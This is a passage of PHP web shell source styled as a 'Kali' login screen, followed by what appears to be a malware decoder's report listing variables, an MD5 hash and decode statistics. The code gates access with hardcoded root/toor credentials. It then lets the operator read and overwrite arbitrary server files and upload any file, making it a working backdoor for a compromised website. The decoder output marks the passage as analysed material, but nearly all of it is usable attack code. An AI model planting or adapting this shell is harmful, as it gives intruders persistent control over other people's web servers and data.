echo "Welcome to << Back|Hack GNU/Linux 2019.1
[Kali Style]
<form action='' method='POST'>
kali login : <input type='text' name='login'>
password : <input type='password' name='pwd'>
<input type='submit' name='log' value=''>";
if(isset($_POST['log'])){
if($_POST['login'] == $user && $_POST['pwd'] == $auth){
$_SESSION['login'] = "$user";
pindah('?');
}else{
echo "login incorrect!\n";
}
}
}
if(!$_SESSION['login']){
login();
}else{
dashboard();
if(isset($_GET['save'])){
$save=$_GET['save'];
if($dir=="~"){$dir=getcwd();}
chdir($dir);
$x=explode(' ',$cmd);
$content=htmlspecialchars(file_get_contents($save));
echo "filename: $save
<textarea name='cont' rows=40 cols=100>$content</textarea>
<form action='' method='POST'><input type='submit' name='savez' value='save'>";
if(isset($_POST['savez'])){
$cont=$_POST['cont'];
$fh=fopen("$save",w);
fwrite($fh,"$cont");
if(fclose($fh)){echo "<script>alert('saved.');</script>";pindah("?dir=$dir");}else{echo "\n<script>alert('permission denied.');</script>\n";pindah("?dir=$dir");}
}
}
elseif(isset($_GET['upload'])){
chdir($dir);
echo "<form action='' method='POST' enctype='multipart/form-data'>
<input type='file' name='upload'><input type='submit' name='uploader' value='Upload'></form>";
if(isset($_POST['uploader'])){
if(@copy($_FILES['upload']['tmp_name'],$_FILES['upload']['name'])){
echo "<script>alert('success.');</script>";pindah("?dir=$dir");
}else{
echo "<script>alert('failed.');</script>";pindah("?dir=$dir");
}
}
}
}
?>

Function Calls

login 1
session_start 1
error_reporting 1

Variables

$auth toor
$user root
$SERVERIP ['FunctionCall', {'name': 'gethostbyname', 'params': [['Parameter', {'node': ['ArrayOffset', {'expr': 'HTTP_HOST', 'node': ['Variable', {'name': '$_SERVER'}]}], 'is_ref': False}]]}]

Stats

MD5 ea413b7302c9d2f25974769d859b981f
Eval Count 0
Decode Time 473 ms